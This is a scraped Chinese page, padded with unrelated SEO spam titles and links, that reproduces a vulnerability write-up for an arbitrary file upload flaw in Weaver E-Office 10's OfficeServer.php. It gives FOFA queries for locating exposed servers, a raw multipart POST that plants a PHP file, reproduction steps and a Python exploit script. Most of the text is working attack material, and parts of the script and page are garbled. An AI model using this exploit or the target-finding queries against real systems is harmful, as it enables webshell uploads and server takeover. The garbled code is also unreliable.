当前位置: 首页 > news >正文

哪里有手机网站建设联系方式核工业南京建设集团网站

news 2026/5/2 18:09:18
哪里有手机网站建设联系方式,核工业南京建设集团网站,海南新闻中心,小米发布会2021时间表声明 本文仅用于技术交流#xff0c;请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失#xff0c;均由使用者本人负责#xff0c;文章作者不为此承担任何责任。 漏洞简介 泛微e-ofice是一款标准化的协同0A办公软件#xff0c;泛微 …声明 本文仅用于技术交流请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失均由使用者本人负责文章作者不为此承担任何责任。 漏洞简介 泛微e-ofice是一款标准化的协同0A办公软件泛微 E-ofice 10 0ficeServer 存在任意文件上传漏洞攻击者可以上传任意文件获取webshell在服务器上执行任意命令、读取敏感信息等 FOFA语法 bodyeoffice10 bodyeoffice_loading_tip Poc POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1 Host: xxx.xxx.xxx.xxx User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Length: 395 Content-Type: multipart/form-data; boundary----WebKitFormBoundaryJjb5ZAJOOXO7fwjs Accept-Encoding: gzip, deflate Connection: close------WebKitFormBoundaryJjb5ZAJOOXO7fwjs Content-Disposition: form-data; nameFileData; filename1.jpg Content-Type: image/jpeg?php phpinfo();unlink(__FILE__);? ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs Content-Disposition: form-data; nameFormData{USERNAME:,RECORDID:undefined,OPTION:SAVEFILE,FILENAME:test12.php} ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--漏洞复现 1、访问漏洞环境 2、老形式burp重放一下 出现下面的状态码和响应包说明漏洞可能存在 3、然后访问如下的URL链接,即可查看上传文件内容 http://xxx.xxx.xxx.xxx/eoffice10/server/public/iWebOffice2015/Document/test12.php poc(python脚本 import re import requestsurlhttp://xxxxxxxxxx/eoffice10/server/public/iWebOffice2015/OfficeServer.php headers {User - Agent:Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0,Content - Length:393,Content - Type: multipart / form - data;,boundary ----WebKitFormBoundaryJjb5ZAJOOXO7fwjsAccept - Encoding: gzip, deflate,Connection:close }data {------WebKitFormBoundaryJjb5ZAJOOXO7fwjsContent-Disposition: form-data; nameFileData; filename1.jpg,Content-Type: image/jpeg?php phpinfo();unlink(__FILE__);?------WebKitFormBoundaryJjb5ZAJOOXO7fwjs,Content-Disposition: form-data; nameFormData{USERNAME:,RECORDID:undefined,OPTION:SAVEFILE,FILENAME:test12.php}------WebKitFormBoundaryJjb5ZAJOOXO7fwjs-- }response requests.post(url, headersheaders, datadata)print(Status Code:, response.status_code)if response.status_code 200:print(存在泛微OA E-Office V10 OfficeServer 任意文件上传漏洞) 修复建议 去官网打补丁
http://www.hkea.cn/news/14504640/

相关文章:

  • 成都网站建设3六六百度站长平台开绿色收录通道加快网站收录
  • php怎么做直播网站吗wordpress标签管理
  • 做金融服务网站赚钱做的好的手机网站有哪些
  • 做棋牌推广网站违反不校园网站cms
  • 公司名被注册网站有经验的盐城网站开发
  • 做网站框架可用jpg图吗毕节做网站优化
  • 电子网站开发技术包括诸城网站制作
  • 企业网站建设排名河北网站建设seo优化营销制作设计
  • 牡丹江地区做网站的公司网站建设在线培训
  • 至少保存十个以上域名网站欧美品牌网站设计
  • 江西企业 网站建设网站视频插件怎么做
  • 深圳网站建设公司公司网络营销竞价推广
  • 广州网站开发定制设计服装网站建设与规划
  • 创建网站免费建程网官网最新信息
  • 做外贸公司网站多少钱网站建设后如何放在网上
  • 河南省建设安全监督站的网站建站步骤图
  • 新网站排名优化天津市住房和城乡建设厅网站
  • 网站图片要多少像素seo怎么做优化工作
  • 怎么做自己的网站赚钱做pc网站会连带手机版
  • 在线营销型网站建设彩页设计公司
  • 做旅游宣传网站的流程孝感建设局网站
  • 中小型网站建设渠道前端案例的网站
  • 企业网站模板源码起名wordpress 会员开卡消费
  • 网站怎么添加关键词创业商机网加工项目
  • 成都个人团队网站开发dw网页设计实训心得
  • 网站seo外链网站界面设计规划
  • html做网站需要服务器吗郑州seo优化哪家好
  • 淘宝联盟的网站管理怎么做组织建设方面
  • 高端网站建设seo常州网站关键词
  • 保险业网站建设制作网站结构设计